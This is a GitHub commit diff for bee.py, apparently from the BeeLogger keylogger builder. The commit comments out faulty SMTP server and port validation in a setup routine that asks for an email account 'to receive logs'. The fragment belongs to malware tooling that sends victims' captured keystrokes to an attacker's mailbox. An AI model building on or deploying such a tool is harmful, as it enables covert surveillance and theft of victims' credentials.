Skip to content

Commit 4370106

Browse files
authored
Update bee.py
1 parent 19d81ac commit 4370106

File tree

1 file changed

+6
-6
lines changed

1 file changed

+6
-6
lines changed

bee.py

Lines changed: 6 additions & 6 deletions
Original file line numberDiff line numberDiff line change
@@ -16,13 +16,13 @@ def begin():
1616
os.system('sudo rm -Rf dist')
1717
print "\n{0}You can see a list with servers and ports in SERVERS.txt on BeeLogger folder.{1}".format(GREEN,END)
1818
gh = raw_input('\nType email server (ex: \'smtp.gmail.com\'): ')
19-
if len(gh) != 1 or 'smtp' not in gh:
20-
print "\n{0} [!] Please use a valid smtp server.{1}".format(RED, END)
21-
begin()
19+
# if len(gh) != 1 or 'smtp' not in gh:
20+
# print "\n{0} [!] Please use a valid smtp server.{1}".format(RED, END)
21+
# begin()
2222
ghp = raw_input('\nType email server port (ex: \'587\'): ')
23-
if len(gh) != 1:
24-
print "\n{0} [!] Please type a valid smtp server port.{1}".format(RED, END)
25-
begin()
23+
# if len(gh) != 1:
24+
# print "\n{0} [!] Please type a valid smtp server port.{1}".format(RED, END)
25+
# begin()
2626
email = raw_input('Type your email to receive logs: ')
2727
epass = raw_input('Type your email password: ')
2828
print '\n'

0 commit comments

Comments
 (0)